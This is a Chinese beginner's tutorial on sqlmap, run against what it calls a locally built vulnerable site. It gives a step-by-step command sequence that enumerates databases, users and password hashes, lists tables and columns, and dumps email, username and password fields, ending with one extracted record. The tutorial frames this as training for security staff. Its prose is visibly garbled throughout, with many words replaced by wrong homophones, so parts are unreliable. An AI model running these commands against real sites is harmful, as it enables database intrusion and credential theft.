對付網(wǎng)絡(luò)安詳人員來說，把握滲透東西的利用要領(lǐng)是一項(xiàng)必備的技術(shù)。然而，一個(gè)沒有師傅教育的小白在剛開始進(jìn)修時(shí)，并不知道該如何入手舉辦滲透進(jìn)修，所以本文旨在輔佐這些小白入門。

sqlmap是一款很是強(qiáng)大的開源sql自動(dòng)化注入東西，可以用來檢測和操作sql注入裂痕。它由python語言開拓而成，，因此運(yùn)行需要安裝python情況。

既然本文是基本教程，以下只寫東西的根基利用要領(lǐng)。

測試情況：當(dāng)?shù)卮罱ǖ木哂衧ql注入點(diǎn)的網(wǎng)站 http://192.168.1.150

留意：sqlmap只是用來檢測和操作sql注入點(diǎn)的，并不能掃描出網(wǎng)站有哪些裂痕，利用前請先利用掃描東西掃出sql注入點(diǎn)。

教程開始：

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

參數(shù)：

-u：指定注入點(diǎn)url

功效：

注入功效展示：

（1）注入?yún)?shù)id為GET注入，注入范例有四類別離為：boolean-based blind、error-based、stacked queries、inline query。

（2）web處事器系統(tǒng)為windows 2003 or XP

（3）web應(yīng)用措施技能為：ASP.NET, Microsoft IIS 6.0

（4）數(shù)據(jù)庫范例為：SQLSERVER 2000

個(gè)中圖一有若干詢問語句，需要用戶輸入[Y/N]，假如你懶得輸入可能不懂怎么輸入可以讓措施自動(dòng)輸入，只需添加一個(gè)參數(shù)即可，呼吁如下：

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

一條呼吁即可曝出該sqlserver中所有數(shù)據(jù)庫名稱，呼吁如下：

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs


參數(shù)：

--dbs：dbs前面有兩條杠，請看清楚。

功效：

功效顯示該sqlserver中共包括7個(gè)可用的數(shù)據(jù)庫。

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db


C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user




C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users


C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords


C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

參數(shù)：

-D：指定命據(jù)庫名稱

--tables：列出表

功效：

功效浮現(xiàn)共列出了34張表。

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns


參數(shù)：

-D：指定命據(jù)庫名稱

-T：指定要列出字段的表

--columns：指定列出字段

功效：

功效顯示該userb表中包括了23條字段。

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

參數(shù)：

-C ：指定要暴的字段

--dump：將功效導(dǎo)出

功效：

假如字段內(nèi)容太多，需要耗費(fèi)許多時(shí)間。可以指定導(dǎo)出特定范疇的字段內(nèi)容，呼吁如下：

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

參數(shù)：

--start：指定開始的行

--stop：指定竣事的行

此條呼吁的寄義為：導(dǎo)出數(shù)據(jù)庫tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數(shù)據(jù)內(nèi)容。

功效如下：

通過上圖功效看到個(gè)中的一個(gè)用戶信息為：

email：[email protected]

username: 1.asp

password: 49ba59abbe56e057